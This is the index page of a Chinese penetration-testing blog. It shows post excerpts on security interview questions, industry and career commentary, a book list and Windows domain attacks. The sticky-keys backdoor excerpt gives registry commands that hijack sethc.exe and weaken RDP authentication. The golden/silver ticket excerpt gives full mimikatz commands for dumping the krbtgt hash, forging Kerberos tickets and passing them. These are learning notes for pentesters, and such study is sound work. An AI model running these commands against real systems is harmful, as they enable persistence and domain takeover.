InfoSec Learning


  • 首页

  • 归档

  • 标签

  • 搜索

公司培训内容笔记

发表于 2020-06-08 | 分类于 unsorted

git

``` git代码版本管理工具 ci工具链的使用

阅读全文 »

应届生的面试题(三)

发表于 2020-05-19 | 分类于 Interview

引子

有空再写,没空就自己找答案吧。。

TCP 为什么三次握手而不是两次握手

https://blog.csdn.net/lengxiao1993/article/details/82771768

为了实现可靠数据传输, TCP 协议的通信双方, 都必须维护一个序列号, 以标识发送出去的数据包中, 哪些是已经被对方收到的。为了实现可靠传输,发送方和接收方始终需要同步( SYNchronize )序号。

如果只是两次握手, 至多只有连接发起方的起始序列号能被确认, 另一方选择的序列号则得不到确认

客户端发送一个请求,服务器回复一份序列号,客户端发送我收到了序列号。

工作组和域的区别

  1. 大小 工作组比较小,不超过20台。域用在比较大的网络,成百上千台。
  2. 拓扑图 工作组中,所有机器的地位是平等的,一台计算机可以自由的加入或退出一个工作组。
  3. 验证方式 在工作组中,用户名、密码存放在本地计算机。如果要登入其他计算机,必须提供用户名,密码;在域中,有一台域控(DC)服务器,其他计算机都要通过DC验证才能加入域。有域权限,可以登入任何域内计算机,无需知道计算机的账号也可以登入。
  4. 网络 工作组计算机必须在同一个子网中;域的计算机可以在不同的本地网络中。

正向代理和反向代理的区别

正向代理:对服务器来说,客户端是透明的(未知的)。比如说翻墙使用的个人专用服务器,就是正向代理,代理替客户端取回google上的资料,而服务器只知道代理服务器取得了资料,不知道是哪个客户端。

反向代理:对客户端来说,服务端是未知的。比如说nginx可以做负载分流作用的反向代理服务器,作用是当有很多请求的时候,它会将请求分流,发送到不同的服务器,防止单台服务器因为过载而崩溃。于是客户端只知道反向代理服务器替我们取回了请求的资源,而不知道那台具体是哪台服务端发送的。

sql宽字节注入

在cms中,对sql注入使用了addslashes函数,对输入的参数进行了转义,单引号前加上反斜杠进行转义。

在mysql中,使用GBK编码,认为2个字符是一个汉字。在前面加%a1等字符,使前面字符和反斜杠能够组合为一个汉字,于是反斜杠就不能对单引号进行转义了。

cobalt strike的代理

redis未授权的利用过程

linux上好像是 写公钥,利用web服务写马,contrab定时任务 然后windows是利用自启动服务,还有web服务,没有web服务就只能重启

csrf和ssrf的区别

有哪些逻辑漏洞

浏览器同源策略

1

阅读全文 »

信息安全行业现状

发表于 2020-05-17 | 分类于 View

信息安全行业现状

1994年4月20日,中国正式接入因特网。

至今2020年,历史短短26年。

国内信息安全企业成立时间长的,哪怕是大企业,也就十多年历史。国内院校培养的信息安全人才远远落后于市场要求。而拥有数十年经验的信息安全人才屈指可数。

院校中能够教授信息安全领域渗透测试方向的老师,可以说是几乎没有。

从2018年开始在信息安全领域打杂以来,看到的Sec的博士也很年轻,不过二三十岁。不是鄙视年轻人,医学方向我们都知道老医生比年轻医生更有经验,所以经验也是很重要的。而作为有经验的基础——年龄大,也是一个充分不必要条件。就说业内很有名的黑客余弦、tomkeeper(2001-2020,有近20年的经验),也是拥有着多年的行业经验。

无论是通过信安混口饭吃的、还是以各个大黑阔为目标的各位,都应该踏踏实实努力个十年再说。

虽然

  • 现在行业各种标准都十分混乱
  • 许多小公司都没有培养人才的能力和愿望
  • 很多公司都不注重信息安全
  • 很多公司注重 销售>技术人员
  • 技术人员承担承担成才时间极长、单干可能性极低,就业面极窄的风险
  • 公司更愿意挖人,而不是培养人才 因为挖人只需要付工资,而培养人才,一旦培养成为能够上手工作的熟练人员,那么可能跳槽,所有付出的培养成本都打水漂
  • 是风险也是机遇。很多成熟的行业各种管理标准都很完善。只能熬资历、拼学历,入行晚了就没有发挥的空间了。大头利润都由业内前辈抽走。有哪些成熟行业这里就不举例了,免得杠精来杠。

但是只要互联网还存在于地球一天、程序员还是由人类编写为止,信息安全都是不愁被AI取代的、不愁没有工作的。

技术行业的风险

作者:天玹六 链接:https://www.zhihu.com/question/54696826/answer/601826541 来源:知乎 著作权归作者所有,转载请联系作者获得授权。

其实所有技术岗都面临四重风险:门槛极高,成才时间极长,单干可能性极低,就业面极窄,并且越牛B的技术岗这四个特征越发突出。 (举例:诺斯诺普格鲁曼公司的核动力航空母舰造船厂及B2幽灵隐形轰炸机工厂,什么进去了你还想跳出来单干??还想跳槽?? 除非你有本事飞出太阳系,否则可能性不是很大)风险总是需要有人承担的,我认为这个点正是中外工业企业一个最本质的差异。

在发达资本主义国家,风险是由企业承担大部分,个人承担小部分(如承诺不裁员,应届生明明没有产出仍然高薪先养着, 技术方向晋升的报酬与管理方向持平甚至略高,行业联盟不搞恶性竞争等,个人往往仅承担行业的系统风险), 而在我国,就业风险全部由个人承担(如随时裁员,应届生没有产出那就先吃屎,做技术的永远是狗,行业永远只搞恶性竞争)。更加恶劣的是,个人非但需要承担全部风险,大部分企业还会利用技术人员个人命运与企业命运捆绑,放弃工作的成本极高的事实(比如我的放弃成本就足以令90%以上的机械工程师打消放弃的念头,但是与其让我放弃生命的尊严而苟活于机械行业,我宁愿放弃生命,我要不是31岁还能啃老估计现在已经重新投胎了),来压低技术人员的报酬水平。

如果有善良的企业不这样做,就会劣币驱逐良币,反而死得更快。(举例:X东前几年不是很牛逼吗?帮快递小哥交五险一金,呵呵呵,现在是按国家规定交五险一金的X东活不下去,还是不交的X丰X通X达活不下去?以前交多了现在降一点,被千夫所指啊,一开始就不交不就什么事都没有了吗?)

企业这种行为导致的严重后果,我称之为“一代而亡”,即技术员哪怕侥幸能够娶妻生子,他也会拼了老命阻止他的下一代进入自己的行业,说得文绉绉一点,就是“人才断层”。机械人才已经断了多少层,我就不再负能量了。

ps:现在媒体不正视“人才断层”的恶劣现实,还在鼓吹“XX核心研发团队平均年龄不到30岁”“相比起美国企业平均年龄50岁的死气沉沉,我们这边朝气勃发”…我不知道从什么时候开始,我们国家的工程师变得跟妓女一样越年轻越值钱了?拿机械工程师跟妓女相提并论,这也太过抬举机械工程师了吧?每个妓女都用得起iphone,机械工程师用得起吗?

技术岗位,初级过剩高级紧缺

作者:胡嵩 链接:https://www.zhihu.com/question/356982241/answer/1010277323 来源:知乎 著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。

前面有答主已经很简短有力的回答了: 初级过剩,高级紧缺。其实以我这么多年的招聘经验(发出1000+ offer, 面试数倍人)来看, 市场的供给情况比这个还要糟糕, 或者说对于有志在技术领域发展的程序员朋友, 前景比你想象的还要好。 市场上90%的程序员达不到大厂的entry level(准入门槛),也就是狼厂的T3,给到正常应届毕业生的及格线。 注意这个讨论的全集并不是初级程序员, 而是全部相关专业的程序员。也就是说市场上很多工作多年的『资深』程序员也达不到这个标准。 T3是啥要求呢? 不管是前端、后端、架构还是算法, 只要能 熟练掌握语言和工具 ,靠谱的完成模块级的开发工作。 按照大家的简历描述, 100%肯定都over qualify了。 可真相仍然是, 在所有简历池子里随机抽取100个, 不到10个能通过狼厂T3级别的面试。 光笔试就可以干掉一大半。原因在于两个字: 基础。且不说绝大部分非科班出身的程序员, 压根就没打算把基础打牢固。 就是我们每年去985 211校招的那些对口专业, 真正把基础学好吃透的学生真是太少了。

学java搞服务端的同学, 有多少真搞懂了引用计数和回收机制?做前端的同学有多少真的理解从用户事件触发到页面刷新, 浏览器侧、网络、后端都发生了什么?常见的算法复杂度放到实际应用问题中, 真没几个能答的上来。

这些可能在不少程序员眼中属于日常用不着的冷知识, 可是真的到了生产环境中, 面临实际问题的时候, 这些基础问题就能把简历上写着各种精通、各种熟练的高手们难倒。

能照猫画虎用成熟框架把代码出来是一码事, 能高效交付高质量的工程成果是另一码事。每次大规模校招, 都不免要感慨一下学校的教育和业界的需求脱节。日常的社招, 更让人感叹,大部分程序员的工作都是重复, 没有在技术提升上起到什么作用。所以, 真正有技术追求的朋友们,不要关心统计数据, 机会大把。

阅读全文 »

粘滞键后门

发表于 2020-05-15 | 分类于 windows

参考资料

  • https://blog.compass-security.com/2018/02/no-need-to-break-in-use-the-backdoor/
  • https://mochazz.github.io/2017/07/29/shift/#%E5%81%B7%E5%A4%A9%E6%8D%A2%E6%97%A5
  • 2020年5月11日,确定该方法有效。粘滞键后门详述

失败的操作

1
2
3
4
5
cd c:\windows\system32
move sethc.exe sethc.exe.bak			#重命名sethc.exe为sethc.exe.bak
copy /y cmd.exe sethc.exe
全都提示拒绝访问
本地管理员权限不行、system权限也不行。

成功的操作

1
2
3
4
5
6
7
move C:\Users\user\Desktop\p.exe C:\windows\system32\p.exe   #将p.exe移动到另一个地址,p.exe是一个反弹shell的exe.

#需要本地管理员权限
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f

#在登陆面板输入5个shift,即可获得反弹的system权限shell
缺点,在登陆以后,就会丢失反弹连接。

使用场景:在3389远程登陆的时候,无需登陆,调出system权限cmd.exe

实验

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
在受害机器设置user authentication,不需要验证。那么其他机器登入的时候,就会无需验证获得登陆面板。
PS C:\Users\Administrator> REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDtyLayer /t REG_DWORD /d 0

---
受害机器替换cmd.exe,在登陆面板5个shift调出cmd.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f

---
管理员权限命令开启3389远程登陆
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

关闭3389端口
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 11111111 /f

windows 10 无效
windows 2008 R2 有效
阅读全文 »

应届生的面试原题(二)二进制安全/web安全面试题

发表于 2020-05-13 | 分类于 Interview

启**辰的面试题

阅读全文 »

论我国的35岁中年危机

发表于 2020-05-12 | 分类于 View

论我国的35岁中年危机

阅读全文 »

攻防测试书籍推荐(持续更新)

发表于 2020-05-11 | 分类于 backup
序列号 分类 书名 出版时间
1 web 《白帽子讲web 安全》 2014年
2 渗透实战 The Hacker Playbook 3(红队版)中文版 2019年
3 渗透实战 《黑客攻防技术宝典:Web 实战篇 ( 第 2版 )》 2012年
4 渗透实战 《黑客攻防技术宝典系统实战篇》 2010年
5 工具类 《渗透测试实践指南:必知必会的工具与方法》  
6 工具类 《 Metasploit 渗透测试魔鬼训练营》 2013年版
7 工具类 《 Kali 渗透测试技术实战》 2014年出版
8 二进制 《0day安全:软件漏洞分析技术(第2版)》 2011年出版
阅读全文 »

域渗透入门(五)金票据、银票据

发表于 2020-05-10 | 分类于 WindowsDomain

域渗透入门(五)金票据、银票据

参考资料

  • https://ldapwiki.com/wiki/Golden%20Ticket
  • https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html#introduction-3
  • https://www.cnblogs.com/wuxinmengyi/p/11768481.html
  • https://www.youtube.com/watch?v=475V07I01J0

录制的视频教程

  • 域渗透实践篇(六)黄金票据与白银票据

黄金票据

信息搜集

漏洞利用

1
2
3
4
5
6
7
8
#导出krbtgt的ntlm hash
mimikatz.exe "lsadump::dcsync /domain:0day.org /user:krbtgt" exit

#伪造黄金票据
mimikatz.exe "kerberos::golden /admin:Administrator /domain:0day.org /sid:S-1-5-21-1812960810-2335050734-3517558805 /krbtgt:36f9d9e6d98ecf8307baf4f46ef842a2 /ticket:Administrator.kirbi" exit

#pass the ticket票据传递,获取域管理员权限
mimikatz.exe "kerberos::ptt Administrator.kirbi" exit

白银票据

信息搜集

1
2
3
4
5
6
7
8
9
10
/domain: The FDQN

/user: 要伪造的目标用户/计算机 Target Account/Computer to Impersonate
/ptt: Optional (Will Inject Ticket or you can do with Rubeus)
/service:cifs	服务参数为cifs
/domain    参数为域名
/sid	   参数为域sid (whoami /user)
/target    可能是目标计算机的主机名
/rc4       服务账号的ntml hash
/user      需要伪造的用户名  NTLM Hash of User Password/Computer Password
1
2
3
4
5
6
7
8
#生成了mimikatz.log文件
mimikatz.exe log "privilege::debug" "sekurlsa::logonpasswords" exit

#伪造白银票据,伪造CIFS服务权限
mimikatz.exe "kerberos::golden /domain:0day.org /sid:S-1-5-21-1812960810-2335050734-3517558805 /target:OWA2010SP3.0day.org /service:CIFS /rc4:01832b04fa3aed862548241a387e3342 /user:Administrator /ptt" exit

dir \OWA2010SP3\c$

阅读全文 »

理财入门

发表于 2020-05-06 | 分类于 View

理财入门

风险越大利润越大。

阅读全文 »

域渗透入门(四)Kerberoasting服务票据离线爆破密码

发表于 2020-05-04 | 分类于 WindowsDomain

域渗透入门(四)Kerberoasting服务票据离线爆破密码

阅读全文 »

域渗透入门(三)pass the ticket

发表于 2020-05-04 | 分类于 WindowsDomain

参考资料

  • 乌云文章:《域渗透——Pass The Hash & Pass The Key》、《域渗透——Pass The Ticket》、《从活动目录获取域管理员权限的各种姿势》
  • https://medium.com/@t0pazg3m/pass-the-ticket-ptt-attack-in-mimikatz-and-a-gotcha-96a5805e257a
  • https://resources.infosecinstitute.com/pass-hash-pass-ticket-no-pain/#gref
阅读全文 »

windows域-cmd用户管理命令

发表于 2020-05-02 | 分类于 windows

查看

阅读全文 »
1 2 3 4 … 33
whale

whale

Aimed at Pro Penetration tester. Email me "weaponmaster3070@gmail.com"

394 日志
31 分类
44 标签
github
© 2021 whale
由 Jekyll 强力驱动
主题 - NexT.Mist
本站访客数 人 总访问量 次